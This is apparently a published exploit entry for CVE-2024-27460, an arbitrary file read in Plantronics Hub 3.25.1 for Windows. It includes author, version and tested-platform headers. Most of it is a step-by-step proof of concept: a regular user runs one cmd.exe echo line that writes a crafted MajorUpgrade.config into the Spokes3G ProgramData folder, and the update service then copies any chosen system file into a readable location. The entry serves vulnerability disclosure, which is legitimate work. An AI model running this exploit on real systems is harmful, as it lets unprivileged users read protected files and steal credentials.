Plantronics Hub 3.25.1 - Arbitrary File Read - CVE-2024-27460

1. # Exploit Title: Plantronics Hub 3.25.1 – Arbitrary File Read
2. # Date: 2024-05-10
3. # Exploit Author: Farid Zerrouk from Deloitte Belgium, Alaa Kachouh from
4. Mastercard
5. # Vendor Homepage:
6. https://support.hp.com/us-en/document/ish_9869257-9869285-16/hpsbpy03895
7. # Version: Plantronics Hub for Windows version 3.25.1
8. # Tested on: Windows 10/11
9. # CVE : CVE-2024-27460
10.  
11. As a regular user drop a file called "MajorUpgrade.config" inside the
12. "C:\ProgramData\Plantronics\Spokes3G" directory. The content of
13. MajorUpgrade.config should look like the following one liner:
14. ^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config
15.  
16. Exchange <FULL-PATH-TO-YOUR-DESIRED-FILE> with a desired file to read/copy
17. (any file on the system). The desired file will be copied into C:\Program
18. Files (x86)\Plantronics\Spokes3G\UpdateServiceTemp
19.  
20. Steps to reproduce (POC):
21. - Open cmd.exe
22. - Navigate using cd C:\ProgramData\Plantronics\Spokes3G
23. - echo ^|^|<FULL-PATH-TO-YOUR-DESIRED-FILE>^|> MajorUpgrade.config
24. - Desired file will be copied into C:\Program Files
25. (x86)\Plantronics\Spokes3G\UpdateServiceTemp
26.